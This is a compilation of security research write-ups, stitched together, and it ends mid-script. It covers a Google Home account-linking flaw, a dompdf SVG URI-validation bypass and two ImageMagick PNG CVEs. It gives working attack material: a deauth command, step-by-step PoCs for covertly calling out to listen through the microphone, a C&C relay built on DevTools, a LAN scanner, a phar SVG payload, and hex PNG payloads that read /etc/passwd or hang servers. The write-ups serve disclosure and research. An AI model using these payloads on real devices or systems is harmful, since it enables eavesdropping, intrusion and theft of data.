I wanted to go further though and come up with an attack that would work on all Google Home devices, regardless of how many other smart devices the user has. I was trying to come up with a way to use a voice command to activate the microphone and exfiltrate the data. Perhaps I could use voice commands to load an application onto the device that opens the microphone? Looking at the “conversational actions” docs, it seemed possible to create an app for the Google Home and then invoke it on a linked device using the command “talk to my test app”. But these “apps” can’t really do much. They don’t have access to the raw audio from the microphone; they only get a transcription of what the user says. They don’t even run on the device itself. Rather, the Google servers talk to your app via webhooks on the device’s behalf. The “smart home actions” seemed more interesting, but that’s something I explored later.

All of a sudden it hit me: these devices support a “call [phone number]” command. You could effectively use this command to tell the device to start sending data from its microphone feed to some arbitrary phone number.

Creating malicious routines

The interface for creating a routine within the Google Home app looks like this:

With the help of mitmproxy, I learned that this is actually just a WebView that embeds the website https://assistant.google.com/settings/routines, which loads fine in a normal web browser (as long as you’re logged in to a Google account). This made reverse engineering it a little easier.

I created a routine to execute the command “call [my phone number]” on Wednesdays at 8:26 PM (it was currently a Wednesday, at 8:25 PM). For routines that run automatically at certain times, you need to specify a “device for audio” (a device to run the routine on). You can choose from a list of devices linked to your account:

A minute later, the routine executed on my Google Home, and it called my phone. I picked up the phone and listened to myself talking through the Google Home’s microphone. Pretty cool!

(Later through inspecting network requests, I found that you can specify not only the hour and minute to activate the routine at, but also the precise second, which meant I only had to wait a few seconds for my routines to activate, rather than about a minute.)

An attack scenario

I had a feeling that Google didn’t intend to make it so easy to access the microphone feed on the Google Home remotely. I quickly thought of an attack scenario:

Attacker wishes to spy on victim.

  1. Victim installs attacker’s malicious Android app.
  2. App detects a Google Home on the network via mDNS.
  3. App uses the basic LAN access it’s automatically granted to silently issue the two HTTP requests necessary to link the attacker’s account to the victim’s device (no special permissions necessary).

Attacker can now spy on the victim through their Google Home.

This still requires social engineering and user interaction, though, which isn’t ideal from an attacker’s perspective. Can we make it cooler?

From a more abstract point of view, the combined device information (name, cert, and cloud ID) basically acts as a “password” that grants remote control of the device. The device exposes this password over the LAN through the local API. Are there other ways for an attacker to access the local API?

In 2019, “CastHack” made the news, as it was discovered that thousands of Google Cast devices (including Google Homes) were exposed to the public Internet. At first it was believed that the issue was these devices’ use of UPnP to automatically open ports on the router related to casting (8008, 8009, and 8443). However, it appears that UPnP is only used by Cast devices for local discovery, not for port forwarding, so the likely cause was a widespread networking misconfiguration (that might be related to UPnP somehow).

The people behind CastHack didn’t realize the true level of access that the local API provides (if combined with cloud APIs):

What can hackers do with this?

Remotely play media on your device, rename your device, factory reset or reboot the device, force it to forget all wifi networks, force it to pair to a new bluetooth speaker/wifi point, and so on.

(These are all local API endpoints, documented by the community already. This was also before the local API started requiring an auth token.)

What CAN’T hackers do with this?

Assuming the Chromecast/Google Home is the only problem you have, hackers CANNOT access other devices on the network or sniff information besides WIFI points and Bluetooth devices. They also don’t have access to your personal Google account, nor the Google Home’s microphone.

There are services like Shodan that allow you to scan the Internet for open ports and vulnerable devices. I was able to find hundreds of Cast devices with port 8443 (local API) publicly exposed using some simple search queries. I didn’t pursue this for very long though, because ultimately bad router configuration is not something Google can fix.

While I was reading about CastHack, however, I encountered articles all the way back from 2014 (!) about the “RickMote”, a PoC contraption developed by Dan Petro, security researcher at Bishop Fox, that hijacks nearby Chromecasts and plays “Never Gonna Give You Up” on YouTube. Petro discovered that, when a Chromecast loses its Internet connection, it enters a “setup mode” and creates its own open Wi-Fi network. The intended purpose is to allow the device’s owner to connect to this network from the Google Home app and reset the Wi-Fi settings (in the event that the password was changed, for example). The “RickMote” takes advantage of this behavior.

It turns out that it’s usually really easy to force nearby devices to disconnect from their Wi-Fi network: just send a bunch of “deauth” packets to the target device. WPA2 provides strong encryption for data frames (as long as you choose a good password). However, “management” frames, like deauthentication frames (which tell clients to disconnect) are not encrypted. 802.11w and WPA3 support encrypted management frames, but the Google Home Mini doesn’t support either of these. (Even if it did, the router would need to support them as well for it to work, and this is rare among consumer home routers at this time due to potential compatibility issues. And finally, even if both the device and router supported them, there are still other methods for an attacker to disrupt your Wi-Fi. Basic channel jamming is always an option, though this requires specialized, illegal hardware. Ultimately, Wi-Fi is a poor choice for devices that must be connected to the Internet at all times.)

I wanted to check if this “setup mode” behavior was still in use on the Google Home. I installed aircrack-ng and used the following command to launch a deauth attack:

aireplay-ng --deauth 0 -a [router BSSID] -c [device MAC address] [interface]

My Google Home immediately disconnected from the network and then made its own:

I connected to the network and used netstat to get the router’s IP (the router being the Google Home), and saw that it assigned itself the IP 192.168.255.249. I issued a local API request to see if it would work:

$ curl -s --insecure https://192.168.255.249:8443/setup/eureka_info?params=name,device_info,sign | python3 -m json.tool
{
    "device_info": {
        [...]
        "cloud_device_id": "590C[...]",
        [...]
    },
    "name": "Office speaker",
    "sign": {
        "certificate": "-----BEGIN CERTIFICATE-----\nMIID[...]\n-----END CERTIFICATE-----\n",
        [...]
    }
}

I was shocked to see that it did! With this information, it’s possible to link an account to the device and remotely control it.

A cooler attack scenario

Attacker wishes to spy on victim. Attacker can get within wireless proximity of the Google Home (but does NOT have the victim’s Wi-Fi password).

  1. Attacker discovers victim’s Google Home by listening for MAC addresses with prefixes associated with Google Inc. (e.g. E4:F0:42).
  2. Attacker sends deauth packets to disconnect the device from its network and make it enter setup mode.
  3. Attacker connects to the device’s setup network and requests its device info.
  4. Attacker connects to the Internet and uses the obtained device info to link their account to the victim’s device.

Attacker can now spy on the victim through their Google Home over the Internet (no need to be within proximity of the device anymore).

What else can we do?

Clearly a linked account gives a tremendous amount of control over the device. I wanted to see if there was anything else an attacker could do. We were now accounting for attackers that aren’t already on the victim’s network. Would it be possible to interact with (and potentially attack) the victim’s other devices through the compromised Google Home? We already know that with a linked account you can:

  • Get the local auth token and change device settings through the local API
  • Execute commands on the device remotely through “routines”
  • Install “actions”, which are like sandboxed applications

Earlier I looked into “conversational actions” and determined that these are too sandboxed to be useful as an attacker. But there is another type of action: “smart home actions”. Device manufacturers (e.g. Philips) can use these to add support for their devices to the Google Home platform (e.g. when the user says “turn on the lights”, their Philips Hue light bulbs will receive a “turn on” command).

One thing I found particularly interesting while reading the documentation was the “Local Home SDK”. Smart home actions used to only run through the Internet (like conversational actions), but Google had recently (April 2020) introduced support for running these locally, improving latency.

The SDK lets you write a local fulfillment app, using TypeScript or JavaScript, that contains your smart home business logic. Google Home or Google Nest devices can load and run your app on-device. Your app communicates directly with your existing smart devices over Wi-Fi on a local area network (LAN) to fulfill user commands, over existing protocols.

Sounded promising. I looked into how it works though and it turns out that these local home apps don’t have direct LAN access. You can’t just connect to any IP you want; rather, you need to specify a “scan configuration” using mDNS, UPnP or UDP broadcast. The Google Home scans the network on your behalf, and if any matching devices are found, it will return a JavaScript object that allows your app to interact with the device over TCP/UDP/HTTP.

Is there any way around this? I noticed that the docs said something about debugging using Chrome DevTools. It turns out that when a local home app is running in testing mode (deployed to the developer’s own account), the Google Home opens port 9222 for the Chrome DevTools Protocol (CDP). CDP access provides complete control over the Chrome instance. For example, you can open or close tabs, and intercept network requests. That got me thinking, maybe I could provide a scan configuration that instructs the Google Home to scan for itself, so I would be able to connect to CDP, take control of the Chrome instance running on the device, and use it to make arbitrary requests within the LAN.

I created a local home app using my linked account and set up the scan config to search for the _googlecast._tcp.local mDNS service. I rebooted the device, and the app loaded automatically. It quickly found itself and I was able to issue HTTP requests to localhost!

CDP uses WebSockets, which can be accessed through the standard JS API. The same-origin policy doesn’t apply to WebSockets, so we can easily initiate a WebSocket to localhost from our local home app (hosted on some public website) without any problems, as long as we have the correct URL. Because CDP access could lead to trivial RCE on the desktop version of Chrome, the WebSocket address is randomly generated each time debugging is enabled, to prevent random websites from connecting. The address can be retrieved through a GET request to http://[CDP host]:9222/json. This is normally protected by the same-origin policy, so we can’t just use an XHR request, but since we have full access to localhost through the Local Home SDK, we can use that to make the request. Once we have the address, we can use the JS WebSocket() constructor to connect.
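Outside the browser sandbox, the same handshake takes a dozen lines of Python (a sketch illustrating the CDP flow; the IP is hypothetical, and Browser.getVersion is just a harmless method to prove the connection works):

import asyncio
import json

import requests
import websockets

CDP_HOST = "192.168.86.132"  # hypothetical Google Home IP with port 9222 open

# /json lists the debuggable targets along with their randomly generated
# webSocketDebuggerUrl values -- the "secret" fetched via the local home app.
targets = requests.get(f"http://{CDP_HOST}:9222/json").json()
ws_url = targets[0]["webSocketDebuggerUrl"]

async def main() -> None:
    async with websockets.connect(ws_url) as ws:
        await ws.send(json.dumps({"id": 1, "method": "Browser.getVersion"}))
        print(await ws.recv())

asyncio.run(main())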

Through CDP, we can send arbitrary HTTP requests within the victim’s LAN, which opens up the victim’s other devices for attack. As I describe later, I also found a way to read and write arbitrary files on the device using CDP.

PoCs

The following PoCs have been published here: https://github.com/DownrightNifty/gh_hack_PoC

Since the security issues have been fixed, none of these probably work anymore, but I thought they were worth documenting/preserving.

PoC #1: Spy on victim

I made a PoC that works on my Android phone (via Python on Termux) to demonstrate how quick and easy the process of linking an account could be. The attack described here could be performed within the span of a few minutes.

For the PoC, I re-implemented the device link and routines APIs in Python, and made the following utilities: google_login.py, link_device.py, reset_volume.py, and call_device.py.

  1. Download protoc and add it to your PATH
  2. Install the requirements: pip3 install requests==2.23.0 gpsoauth httpx[http2]
  3. Create the “attacker” Google account
  4. Log in with python3 google_login.py
  5. Get within wireless proximity of the Google Home
  6. Deauth the Google Home
    • Raw packet injection (required for deauth attacks) requires a rooted phone and won’t work on some Wi-Fi chips. I ended up using a NodeMCU, a tiny Wi-Fi development board going for less than $5 on Amazon, and flashed it with spacehuhn’s deauther firmware. You can use its web UI to scan for nearby devices and deauth them. It quickly found my Google Home (manufacturer listed as “Google” based on the MAC address prefix) and I was able to deauth it.
  7. Connect to the Google Home’s setup network (named [device name].o)
  8. Run python3 link_device.py --setup_mode 192.168.255.249 to link your account to the device
    • In addition to linking your account, to make the attack as stealthy as possible, “night mode” is also enabled on the device, which decreases the maximum volume and LED brightness. Since music volume is unaffected, and the volume decrease is almost entirely suppressed when the volume is greater than 50%, this subtle change is unlikely to be noticed by the victim. However, it makes it so that, at 0% volume, the Assistant voice is completely muted (whereas with night mode off, it can still barely be heard at 0%).
  9. Stop the deauth attack and wait for the device to re-connect to the Internet
    • You can run python3 reset_volume.py 4 to reset the volume to 40% (since enabling night mode set it to 0%).
  10. Now that your account is linked, you can make the device call your phone number, silently, at any time, over the Internet, allowing you to listen in to the microphone feed.
    • To issue a call, run python3 call_device.py [phone number].
    • The commands “set the volume to 0” and “call [number]” are executed on the device remotely using a routine.
    • The only thing the victim may notice is that the device’s LEDs turn solid blue, but they’d probably just assume it’s updating the firmware or something. In fact, the official support page describing what the LED colors mean only says solid blue means “Your speaker needs to be verified by you” and makes no mention of calling. During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.

Here’s a video demonstrating what it looks like when a call is initiated remotely:

As you can see, there is no audible indication that the commands are running, which makes it difficult for the victim to notice. The victim can still use their device normally for the most part (although certain commands, like music playback, don’t work during a call).

PoC #2: Make arbitrary HTTP requests on victim’s network

As I described earlier, the attacker can install a smart home action onto the linked device remotely, and leverage the Local Home SDK to make arbitrary HTTP requests within the victim’s LAN. c2.py is the command & control server. app.js and index.html are the local home app.

  1. Configure and start the C&C server:
    • Install the requirements: pip3 install mitmproxy websockets
    • Start the server: mitmdump --listen-port 8000 --set upstream_cert=false --ssl-insecure -s c2.py
      • Under the default configuration, a proxy server starts on localhost:8000, and a WebSocket server starts on 0.0.0.0:9000. The proxy server acts as a relay, sending requests from programs on your computer (like curl) to the victim’s Google Home through the WebSocket. In a real attack, the WebSocket port would need to be exposed to the Internet so the victim’s Google Home could connect to it, but for local demonstration, it doesn’t have to be.
  2. Configure the local home app:
    • Change the C2_WS_URL variable at the top of app.js to the WebSocket URL for your C&C server. This needs to be reachable by the Google Home.
    • Host the static index.html and app.js files somewhere reachable by the Google Home. For local demonstration, you can spin up a simple file hosting server using python3 -m http.server.
  3. Deploy the local home app to your account:

npm run firebase --prefix functions/ -- functions:config:set \
    strand1.leds=16 strand1.channel=1 \
    strand1.control_protocol=HTTP
npm run deploy --prefix functions/

    • This tells the cloud fulfillment to include an otherDeviceIds field in responses to SYNC requests. As far as I understand, this is all that’s required to activate local fulfillment; the specific device IDs or attributes you choose don’t matter.
  4. Get within wireless proximity of the victim’s Google Home, then force it into setup mode, and link your account using the link_device.py script from PoC #1.
  5. Reboot the device:
    • While still connected to the device’s setup network, send a POST request to the /reboot endpoint with the body {"params":"now"} and a cast-local-authorization-token header (obtained with HomeGraphAPI.get_local_auth_tokens() from googleapi.py).
    • For local demonstration, you can just unplug the Google Home then plug it back in.
  6. Not long after the reboot, the Google Home automatically downloads your local home app and runs it.
    • The app waits for the IDENTIFY request it receives when the Google Home finds itself through mDNS scanning, then connects to the Chrome DevTools Protocol WebSocket on port 9222. After connecting to CDP, it opens a WebSocket to your C&C server and waits for commands. If disconnected from either CDP or the C&C server, it automatically tries to reconnect every 5 seconds.
    • Once loaded, it seems to run indefinitely. The documentation says apps may be killed if they consume too much memory, but I haven’t run into this, and I’ve even left my app running overnight. If the Google Home is rebooted, the app will reload.

Now, you can send HTTP(S) requests on the victim’s private LAN, as if you had the WiFi password, even though you don’t (yet), by configuring a program on your computer to route its traffic through the local proxy server, which in turn routes it to the Google Home. For example, curl --proxy 'localhost:8000' --insecure -v https://localhost:8443/setup/eureka_info returns the Google Home’s info, because through the proxy, localhost resolves to the Google Home’s IP. The JSON response to /setup/eureka_info contains the IP, which is helpful for determining the layout of the LAN.

I was even able to route Chrome through the proxy, with chrome --proxy-server='localhost:8000' --ignore-certificate-errors --user-data-dir='SOME_DIR', and it worked surprisingly well.

Obviously, the ability to send requests on the private LAN opens a large attack surface. Using the IP of the Google Home, you can determine the subnet that the victim’s other devices are on. For example, my Google Home’s IP is 192.168.86.132, so I could guess that my other devices are in the 192.168.86.0 to 192.168.86.255 range. You could write a simple script to curl every possible address, looking for devices on the LAN to attack or steal data from. Since it only takes a few seconds to check each IP, it would only take around 10 minutes to try every one. On my LAN, I found my printer’s web interface at http://192.168.86.33. Its network settings page contains an <input type="password"> pre-filled with my WiFi password in plaintext. It also provides a firmware update mechanism, which I imagine could be vulnerable to attack.
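Such a scanner fits in a few lines of Python (a sketch; the subnet matches the example above, and it only probes HTTP on port 80):

import concurrent.futures

import requests

def probe(ip: str) -> None:
    try:
        # Any response at all means something is listening and worth a look.
        # In the real attack, add proxies={"http": "http://localhost:8000"}
        # so the request is relayed through the victim's Google Home.
        r = requests.get(f"http://{ip}", timeout=3)
        print(ip, r.status_code, r.headers.get("Server", ""))
    except requests.RequestException:
        pass

ips = [f"192.168.86.{i}" for i in range(1, 255)]
with concurrent.futures.ThreadPoolExecutor(max_workers=32) as pool:
    pool.map(probe, ips)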

Another approach would be looking for the victim’s router and trying to attack that. My router’s IP, 192.168.1.254, shows up among the first results when you Google “default router IPs”. You could write a script to try these. My router’s configuration interface also immediately returns my WiFi password in plaintext. Luckily, I’ve changed the default admin password, so at the very least an attacker with access to it wouldn’t be able to modify the settings, but most people don’t change this password, so you could find it by searching for “[brand name] router password”, then set the DNS server to your own, install malicious firmware updates, etc. Even if the victim changed their router’s password, it may still be vulnerable. For example, in June 2020, a researcher found a buffer overflow vulnerability in the web interface on 79 Netgear router models that led to a root shell, and described the process as “easy”.

PoC #3: Read/write arbitrary files on device

I also found a way to read/write arbitrary files on the linked device using the DOM.setFileInputFiles and Page.setDownloadBehavior methods of the Chrome DevTools Protocol.

The following reproduction steps first write a file, /tmp/example_file.txt, then read it back to verify that it worked.

  1. Enable remote debugging on the Google Home
  2. Install the requirements:

npm install ws
pip install flask

  3. Create an example_file.txt, e.g. echo 'test' > example_file.txt
  4. Run python3 write_server.py example_file.txt. You can optionally modify the HOST or PORT variables at the top of the script. Get the URL of the server, like http://[IP]:[port]. This must be reachable by the Google Home.
  5. Run node write.js [Google Home IP] [write server URL] /tmp, inserting the appropriate values. You can get the Google Home’s IP from the Google Home app. The file will be written to /tmp/example_file.txt.
  6. Run python3 read_server.py. You can modify the host/port like before.
  7. Run node read.js [Google Home IP] [read server URL]. When prompted for a file path to read, enter /tmp/example_file.txt.
  8. Verify that example_file.txt was dumped from the device to dumped_files/example_file.txt.

Since I couldn’t explore the filesystem of my Google Home (and <input type="file" webkitdirectory> didn’t work to upload folders instead of files), I’m not sure exactly what the impact of this was. I was able to find some info about the filesystem structure from the “open source licenses” info, and from the DEFCON talk on the Google Home. I dumped a few binaries like /system/chrome/cast_shell and /system/chrome/lib/libassistant.so, then ran strings on them, looking for interesting files to steal or tamper with. It looks like /data/chrome/chirp/assistant/cookie may contain user info? /data/chrome/chirp/assistant/settings and /data/chrome/chirp/assistant/phenotype_package_store both contain the GAIA IDs of the accounts linked to my Google Home. I was able to dump /data/chrome/chirp/assistant/nightmode/nightmode_params, hex edit it, and overwrite the original with my modified version, and the changes were applied after a reboot. If, for example, a bug in a config file parser was found, I imagine that this could have potentially led to RCE?

The fixes

I’m aware of the following fixes deployed by Google:

  • You must request an invite to the “Home” that the device is registered to in order to link your account to it through the /deviceuserlinksbatch API. If you’re not added to the Home but you try to link your account this way, you’ll get a PERMISSION_DENIED error.
  • “Call [phone number]” commands can’t be initiated remotely through routines.

You can still deauth the Google Home and access its device info through the /setup/eureka_info endpoint, but you can’t use it to link your account anymore, and you can’t access the rest of the local API (because you can’t get a local auth token).

On devices with a display (e.g. Google Nest Hub), the setup network is protected with a WPA2 password that appears as a QR code on the display (scanned with the Google Home app), adding an additional layer of protection.

Additionally, on these devices, you can say “add my voice” to bring up a screen with a link code instructing you to visit https://g.co/nest/voice. You can link your account to the device through this website, even if you aren’t added to its Home (which is fine, because this still requires physical access to the device). The “add my voice” command doesn’t appear to work on the Google Home Mini, probably since it doesn’t have a display that it can use to provide a link code. I guess if Google wanted to implement this, they could make it speak the link code out loud or text it to a provided phone number or something.

Reflection/conclusions

Google Home’s architecture is based on Chromecast. Chromecast doesn’t place much emphasis on security against proximity-based attacks because it’s mostly unnecessary. What’s the worst that could happen if someone hacks your Chromecast? Maybe they could play obscene videos? However, the Google Home is a much more security-critical device, due to the fact that it has control over your other smart home devices, and a microphone. If the Google Home architecture had been built from scratch, I imagine that these issues would have never existed.

Ever since the first Google Home device was released in November 2016, Google has continued to add more and more features to the device’s cloud APIs, like scheduled routines (July 2018) and the Local Home SDK (April 2020). I’m guessing that the engineers behind these features were under the assumption that the account linking process was secure.

Many other security researchers had already given the Google Home a look before me, but somehow it appears that none of them noticed these seemingly glaring issues. I guess they were mainly focused on the endpoints that the local API exposed and what an attacker could do with those. However, these endpoints only allow for adjusting a few basic device settings, and not much else. While the issues I discovered may seem obvious in hindsight, I think that they were actually pretty subtle. Rather than making a local API request to control the device, you instead make a local API request to retrieve innocuous-looking device info, and use that info along with cloud APIs to control the device.

As the DEFCON talk shows, the low-level security of the device is generally pretty good, and buffer overflows and such are hard to come by. The issues I found were lurking at the high level.

Many thanks to Google for the incredibly generous rewards!

Disclosure timeline

  • 01/08/2021: Reported
  • 01/10/2021: Triaged
  • 01/20/2021: Closed (Intended Behavior)
  • I was busy with school stuff, so it took me a while to respond
  • 03/11/2021: Sent additional details and PoC
  • 03/19/2021: Reopened
  • 04/07/2021: Sent additional details
  • 04/20/2021: Reward received
  • 04/05/2022: Google announced increased rewards for Google Nest and Fitbit devices
  • 05/04/2022: Bonus rewards received

Prior research

Here are some articles I found during my research on Google Home devices that I thought were interesting:

Footnote: Static analysis of Google Home app

During my research, I did a little digging within the Google Home app. I didn’t find any security issues here, but I did discover some things about the local API that the unofficial docs don’t yet include.

show_led endpoint

To find a list of local API endpoints (and potentially some undocumented ones), I searched for a known endpoint (get_app_device_id) in the decompiled sources:

The information I was looking for was in defpackage/ufo.java:

SHOW_LED sounded interesting, and it wasn’t in the unofficial docs. Searching for where this constant is used led me to StereoPairCreationActivity:

With the help of JADX’s amazing “rename symbol” feature, and after renaming some methods, I was able to find the class responsible for constructing the JSON payload for this endpoint:

Looks like the payload consists of an integer animation_id. We can use the endpoint like so:

$ curl --insecure -X POST -H 'cast-local-authorization-token: [token]' -H 'Content-Type: application/json' -d '{"animation_id":2}' https://[Google Home IP]:8443/setup/assistant/show_led

This makes the LEDs play a slow pulsing animation. Unfortunately it seems that there are only two animations: 1 (reset LEDs to normal) and 2 (continuous pulsing). Oh, well.

Wi-Fi password encryption

I was also able to find the algorithm used to encrypt the user’s Wi-Fi password before sending it through the /setup/connect_wifi endpoint. Now that HTTPS is used, this encryption seems redundant, but I imagine that this was originally implemented to protect against MITM attacks exposing the Wi-Fi password. Anyway, we see that the password is encrypted using RSA PKCS1 and the device’s public key (from /setup/eureka_info):
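Reproducing the scheme in Python is straightforward (a sketch using the cryptography package; the PEM blob is a placeholder for the device’s actual public key, and the base64 wrapping is my assumption about how the ciphertext is transported):

import base64

from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding

# Placeholder: substitute the RSA public key obtained from the device.
device_pem = b"""-----BEGIN PUBLIC KEY-----
...device key here...
-----END PUBLIC KEY-----
"""

public_key = serialization.load_pem_public_key(device_pem)

# RSA PKCS1 v1.5 with the device key, as the decompiled Home app does.
ciphertext = public_key.encrypt(b"my wifi password", padding.PKCS1v15())
print(base64.b64encode(ciphertext).decode())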

Footnote: Deauth attacks on Google Home Mini

I mentioned above that the Google Home Mini supports neither WPA3 nor 802.11w. I’d like to clarify how I discovered this.

Since my router doesn’t support these, I borrowed a friend’s router running OpenWrt, a FOSS operating system for routers, which does support 802.11w and WPA3.

There are three 802.11w modes you can choose from: disabled (default), optional, and required. (“Optional” means that it’s used only for devices that support it.) While I was using “required”, my Google Home Mini was unable to connect, meanwhile my Pixel 5 (Android 12) and MacBook Pro (macOS 12.4) had no issues. Same results when I enabled WPA3. I tried “optional” and the Google Home Mini connected, but was still vulnerable to deauth attacks (as expected).

I tested this on the latest Google Home Mini firmware at the time of writing (1.56.309385, August 2022), on 1st gen (codename mushroom) hardware. I’m assuming this is a limitation of the Wi-Fi chip that it uses, rather than a software issue.

Dompdf vulnerable to URI validation failure on SVG parsing

Original text by Blaklis

Summary

The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing <image> tags with uppercase letters. This might lead to arbitrary object unserialization on PHP < 8, through the phar URL wrapper.

Details

The bug occurs during SVG parsing of <image> tags, in src/Image/Cache.php:

if ($type === "svg") {
    $parser = xml_parser_create("utf-8");
    xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false);
    xml_set_element_handler(
        $parser,
        function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) {
            if ($name === "image") {
                $attributes = array_change_key_case($attributes, CASE_LOWER);

This part will try to detect <image> tags in the SVG, and will take the href to validate it against the protocolAllowed whitelist. However, the $name comparison with “image” is case sensitive, which means that such a tag in the SVG will pass:

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

As the tag is named “Image” and not “image”, it does not match the condition, so the href check is never triggered.

A correct solution would be to strtolower the $name before the check:

if (strtolower($name) === "image") {

PoC

Parsing the following SVG file is sufficient to reproduce the vulnerability :

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

Impact

An attacker might be able to exploit the vulnerability to call arbitrary URLs with arbitrary protocols, if they can provide an SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialization, which leads at the very least to arbitrary file deletion, and might lead to remote code execution, depending on the classes that are available.

ImageMagick: The hidden vulnerability behind your online images

Original text by the Metabase Q Team (Bryan Gonzalez, Ocelot Team)

Introduction

ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats, so it is very common to find it on websites worldwide, since there is always a need to process pictures for users’ profiles, catalogs, etc.

In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence, the team decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero days were identified:

  • CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
  • CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).

How to trigger the exploitation?

An attacker needs to upload a malicious image to a website that uses ImageMagick in order to exploit the above-mentioned vulnerabilities remotely.

The Ocelot team is very grateful to the ImageMagick team of volunteers, who validated and released the needed patches in a timely manner:

https://github.com/ImageMagick/ImageMagick/commit/05673e63c919e61ffa1107804d1138c46547a475

In this blog, the technical details of the vulnerabilities are explained.

CVE-2022-44267: Denial of service

ImageMagick:  7.1.0-49

When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process could be left waiting for stdin input leading to a Denial of Service since the process won’t be able to process other images.

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile. If the specified filename is “-“ (a single dash) ImageMagick will try to read the content from standard input potentially leaving the process waiting forever.

Exploitation path:

  • Upload an image to trigger an ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164): reads the “tEXt” chunk
  • SetImageProfile (MagickCore/property.c:4360): checks if the keyword equals “profile”, copies the text string as a filename in line 4720 and saves the content in line 4722
  • FileToStringInfo stores the content into string_info->datum (MagickCore/string.c:1005):
MagickExport StringInfo *FileToStringInfo(const char *filename,
  const size_t extent,ExceptionInfo *exception)
{
  StringInfo
    *string_info;

  assert(filename != (const char *) NULL);
  assert(exception != (ExceptionInfo *) NULL);
  if (IsEventLogging() != MagickFalse)
    (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",filename);
  string_info=AcquireStringInfoContainer();
  string_info->path=ConstantString(filename);
  string_info->datum=(unsigned char *) FileToBlob(filename,extent,
    &string_info->length,exception);
  if (string_info->datum == (unsigned char *) NULL)
    {
      string_info=DestroyStringInfo(string_info);
      return((StringInfo *) NULL);
    }
  return(string_info);
}

FileToBlob (MagickCore/blob.c:1396): a filename of “-” is mapped to stdin, causing the process to wait for input forever:

  file=fileno(stdin);
  if (LocaleCompare(filename,"-") != 0)
    {
      status=GetPathAttributes(filename,&attributes);
      if ((status == MagickFalse) || (S_ISDIR(attributes.st_mode) != 0))
        {
          ThrowFileException(exception,BlobError,"UnableToReadBlob",filename);
          return(NULL);
        }
      file=open_utf8(filename,O_RDONLY | O_BINARY,0);
    }
  if (file == -1)
    {
      ThrowFileException(exception,BlobError,"UnableToOpenFile",filename);
      return(NULL);
    }
  offset=(MagickOffsetType) lseek(file,0,SEEK_END);
  count=0;
  if ((file == fileno(stdin)) || (offset < 0) ||
      (offset != (MagickOffsetType) ((ssize_t) offset)))
    {
      size_t
        quantum;

      struct stat
        file_stats;

      /*
        Stream is not seekable.
      */
      offset=(MagickOffsetType) lseek(file,0,SEEK_SET);
      quantum=(size_t) MagickMaxBufferExtent;
      if ((fstat(file,&file_stats) == 0) && (file_stats.st_size > 0))
        quantum=(size_t) MagickMin(file_stats.st_size,MagickMaxBufferExtent);
      blob=(unsigned char *) AcquireQuantumMemory(quantum,sizeof(*blob));
      for (i=0; blob != (unsigned char *) NULL; i+=count)
      {
        count=read(file,blob+i,quantum);

PoC: Malicious PNG File:

89504E470D0A1A0A0000000D49484452000000010000000108000000003A7E9B550000000B49444154789C63F8FF1F00030001FFFC25DC510000000A7445587470726F66696C65002D00600C56A10000000049454E44AE426082
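For convenience, a small sketch that writes the PoC bytes to disk (the convert invocation in the comment is just one way a website might trigger the parse):

poc_hex = (
    "89504E470D0A1A0A0000000D49484452000000010000000108000000003A7E9B55"
    "0000000B49444154789C63F8FF1F00030001FFFC25DC510000000A74455874"
    "70726F66696C65002D00600C56A10000000049454E44AE426082"
)

with open("OCELOT_output.png", "wb") as f:
    f.write(bytes.fromhex(poc_hex))

# On a vulnerable ImageMagick 7.1.0-49, a resize such as
#   convert OCELOT_output.png -resize 50% out.png
# blocks forever waiting on stdin.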

Evidence: Malicious image file: OCELOT_output.png

Stdin input waiting forever:

CVE-2022-44268: Arbitrary Remote Leak

ImageMagick:  7.1.0-49

When ImageMagick parses the PNG file, for example in a resize operation, the resulting image could have embedded the content of an arbitrary remote file from the website (if the magick binary has permissions to read it).

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.

Exploitation path:

  • Upload an image to trigger an ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164): reads the tEXt chunk
  • SetImageProfile (MagickCore/property.c:4360): checks if the keyword equals “profile”, copies the text string as a filename in line 4720 and saves the content in line 4722
  • FileToStringInfo stores the content into string_info->datum (MagickCore/string.c:1005)

If a valid (and accessible) filename is provided, the content will be returned to the caller function (FileToStringInfo) and the StringInfo object will return to the SetImageProperty function, saving the blob into the new image generated, thanks to the function SetImageProfile:

This new image will be available for the attacker to download, with the content of the arbitrary file from the website embedded inside.

PoC: Malicious PNG content to leak “/etc/passwd” file:

89504E470D0A1A0A0000000D4948445200000001000000010100000000376EF9240000000A49444154789C636800000082008177CD72B6000000147445587470726F66696C65002F6574632F70617373776400B7F46D9C0000000049454E44AE426082
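Once the attacker downloads the resized image, the stolen bytes can be recovered by walking the PNG text chunks (a sketch; it assumes the leaked data comes back hex-encoded in a “Raw profile” tEXt/zTXt chunk, and out.png is a hypothetical name for the downloaded image):

import struct
import zlib

with open("out.png", "rb") as f:
    png = f.read()

pos = 8  # skip the PNG signature
while pos < len(png):
    length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
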